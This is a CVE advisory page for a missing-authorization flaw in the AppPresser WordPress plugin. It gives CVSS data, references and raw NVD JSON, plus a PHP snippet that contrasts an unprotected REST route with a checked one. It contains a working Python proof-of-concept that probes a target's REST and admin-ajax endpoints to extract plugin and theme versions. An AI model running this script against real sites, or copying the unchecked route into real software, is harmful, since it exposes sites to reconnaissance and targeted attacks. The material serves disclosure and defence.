Security Vulnerability Report
CVE-2025-11881 CVSS 5.3 MEDIUM

CVE-2025-11881

Published: 2025-10-30 07:15:33
Last Modified: 2026-04-15 00:35:42

Description

The AppPresser – Mobile App Framework plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'myappp_verify' function in all versions up to, and including, 4.5.0. This makes it possible for unauthenticated attackers to extract sensitive data including plugin and theme names and version numbers, which can be used to facilitate targeted attacks against outdated or vulnerable components.
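The missing-authorization pattern (CWE-862) described above, as an added illustration in WordPress PHP that is not AppPresser's own code: a REST route that returns installed plugin and theme versions with no permission check, beside the hardened form. The route namespace, function names and the 'manage_options' capability are assumptions.

```php
<?php
// Added illustration (not AppPresser's code). Route namespace, function names
// and the required capability are assumptions chosen for the example.

// Weak form: permission_callback accepts every request, so the version data
// is readable by anyone who can reach the REST API.
function example_register_verify_route_unsafe() {
    register_rest_route( 'example/v1', '/verify', array(
        'methods'             => 'GET',
        'callback'            => 'example_component_versions',
        'permission_callback' => '__return_true',   // no capability check
    ) );
}

// Hardened form: the same route, reachable only by users holding a capability.
function example_register_verify_route_safe() {
    register_rest_route( 'example/v1', '/verify', array(
        'methods'             => 'GET',
        'callback'            => 'example_component_versions',
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
    ) );
}

// The data an unauthenticated caller could read under the weak form:
// plugin names with versions and the active theme's name and version.
function example_component_versions( WP_REST_Request $request ) {
    if ( ! function_exists( 'get_plugins' ) ) {
        require_once ABSPATH . 'wp-admin/includes/plugin.php';
    }
    $plugins = array();
    foreach ( get_plugins() as $file => $data ) {
        $plugins[ $file ] = $data['Version'];
    }
    $theme = wp_get_theme();
    return rest_ensure_response( array(
        'plugins' => $plugins,
        'theme'   => array( $theme->get( 'Name' ) => $theme->get( 'Version' ) ),
    ) );
}

// Register only the checked variant.
add_action( 'rest_api_init', 'example_register_verify_route_safe' );
```

For an admin-ajax handler the equivalent fix is a current_user_can() check inside the handler and registering only the wp_ajax_ hook, not wp_ajax_nopriv_, so the action is never exposed to logged-out requests.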

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

AppPresser WordPress plugin <= 4.5.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11881 PoC - AppPresser Unauthenticated Information Disclosure
# Target: WordPress site with AppPresser plugin <= 4.5.0
import requests
import json
import sys


def exploit_apppresser(target_url):
    """
    Exploit for CVE-2025-11881
    Unauthenticated access to sensitive plugin/theme information
    """
    # Target the vulnerable endpoint
    endpoint = f"{target_url}/wp-json/myappp/v1/verify"
    # Alternatively, try the direct function call
    alt_endpoint = f"{target_url}/wp-admin/admin-ajax.php"

    print(f"[*] Target: {target_url}")
    print(f"[*] Testing endpoint: {endpoint}")

    # Method 1: Direct REST API call
    try:
        response = requests.get(endpoint, timeout=10)
        if response.status_code == 200:
            print("[+] Potential information disclosure detected!")
            print(f"[+] Response: {response.text[:500]}")
            return True
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")

    # Method 2: AJAX endpoint with crafted request
    try:
        data = {
            'action': 'myappp_verify',
            'app_id': 'test',
            'nonce': ''
        }
        response = requests.post(alt_endpoint, data=data, timeout=10)
        if response.status_code == 200 and 'plugins' in response.text.lower():
            print("[+] Vulnerable endpoint found via AJAX!")
            print(f"[+] Response preview: {response.text[:500]}")
            return True
    except requests.RequestException as e:
        print(f"[-] AJAX request failed: {e}")

    print("[-] No vulnerable endpoint found or target not affected")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-11881.py <target_url>")
        print("Example: python cve-2025-11881.py http://example.com")
        sys.exit(1)
    target = sys.argv[1].rstrip('/')
    exploit_apppresser(target)
```

References

https://plugins.trac.wordpress.org/browser/apppresser/tags/4.5.0/inc/AppPresser_WPAPI_Mods.php#L162
https://plugins.trac.wordpress.org/browser/apppresser/tags/4.5.0/inc/AppPresser_WPAPI_Mods.php#L879
https://plugins.trac.wordpress.org/changeset/3385855/
https://www.wordfence.com/threat-intel/vulnerabilities/id/62c3f54c-6bfb-4f11-9457-a09d28f83175?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-11881",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-30T07:15:32.520",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The AppPresser – Mobile App Framework plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'myappp_verify' function in all versions up to, and including, 4.5.0. This makes it possible for unauthenticated attackers to extract sensitive data including plugin and theme names and version numbers, which can be used to facilitate targeted attacks against outdated or vulnerable components."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/apppresser/tags/4.5.0/inc/AppPresser_WPAPI_Mods.php#L162",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/apppresser/tags/4.5.0/inc/AppPresser_WPAPI_Mods.php#L879",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3385855/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/62c3f54c-6bfb-4f11-9457-a09d28f83175?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```